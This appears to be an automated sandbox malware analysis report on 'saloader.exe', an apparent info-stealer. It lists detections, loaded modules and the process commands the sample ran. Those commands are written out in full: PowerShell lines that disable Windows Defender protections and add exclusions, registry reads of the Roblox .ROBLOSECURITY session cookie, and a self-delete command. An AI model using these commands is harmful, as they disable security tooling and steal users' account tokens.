Source: powershell.exe, 00000011.00000002.1408003898.0000022F02D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A0179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D6D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000011.00000002.1408003898.0000022F02D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A0179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D6D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49813 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: C:\Users\user\Desktop\saloader.exe | File written: C:\Windows\System32\drivers\etc\hosts

                        System Summary

                        Source: saloader.exe, type: SAMPLE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPED | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC621D18
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC625560
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC660D48
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC668E08
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC660DC0
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC62C5C8
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC62BF9D
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC620010
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC62F8AA
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC62C0F8
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC61CA16
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC629A88
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC616A58
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC62AAD0
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC61DB08
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E1D80
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7D4198
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E4191
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DECBA
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E70F2
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DAA95
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DEA10
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7D338E
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E4C62
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DE830
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DE940
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DE950
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DE978
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DE980
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DC4F2
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E0CF0
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DA502
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7D6AA7
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E4359
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7D7B28
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DF32E
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E432C
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7D883D
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DF463
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E4FF9
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E4428
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7D481D
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7DE838
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFAAC62947D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFAAC6F3C86
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC703292
                        Source: saloader.exe, 00000000.00000000.1205927214.000002113D67C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename vs saloader.exe
                        Source: saloader.exe | Binary or memory string: OriginalFilename vs saloader.exe
                        Source: saloader.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: saloader.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: saloader.exe, ------.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: saloader.exe, -------.cs | Base64 encoded string: 'rTd2ZqqxHKGDkmQucWohfW8iyG9SsMBqRCBl7sGg1S4qEzQO8MQhKhSgsSxD8Cux4BS0sGX48TfIuuruS8b8nP18HitfMrBZelHvgGZ1oqjymBjFAtto7Iw6++BT7HGLBIv1HlaO0W9bbZFNGtt/LiyOF4NRWf8zST4pmT2dijiQIVCuIrlHTZe/6Pw='
                        Source: FRc7Z.scr.0.dr, ------.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: FRc7Z.scr.0.dr, -------.cs | Base64 encoded string: 'rTd2ZqqxHKGDkmQucWohfW8iyG9SsMBqRCBl7sGg1S4qEzQO8MQhKhSgsSxD8Cux4BS0sGX48TfIuuruS8b8nP18HitfMrBZelHvgGZ1oqjymBjFAtto7Iw6++BT7HGLBIv1HlaO0W9bbZFNGtt/LiyOF4NRWf8zST4pmT2dijiQIVCuIrlHTZe/6Pw='
                        Source: saloader.exe, ------.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: saloader.exe, ------.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: FRc7Z.scr.0.dr, ------.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: FRc7Z.scr.0.dr, ------.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@37/24@2/2
                        Source: C:\Users\user\Desktop\saloader.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\saloader.exe.log
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6652:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
                        Source: C:\Users\user\Desktop\saloader.exe | Mutant created: \Sessions\1\BaseNamedObjects\Muktoz4DQf6EygK0cxqE
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
                        Source: C:\Users\user\Desktop\saloader.exe | File created: C:\Users\user\AppData\Local\Temp\9vfZ0GMUz2LnbwL
                        Source: saloader.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: saloader.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\saloader.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\saloader.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F99F000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F900000.00000004.00000800.00020000.00000000.sdmp, KlGFZy9pxbPzA5I.0.dr, eWNRtPVIqbA91oh.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: saloader.exe | ReversingLabs: Detection: 78%
                        Source: saloader.exe | Virustotal: Detection: 75%
                        Source: C:\Users\user\Desktop\saloader.exe | File read: C:\Users\user\Desktop\saloader.exe
                        Source: unknown | Process created: C:\Users\user\Desktop\saloader.exe "C:\Users\user\Desktop\saloader.exe"
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe"
                        Source: C:\Windows\System32\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pause
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe"
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pause
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: devenum.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: msdmo.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
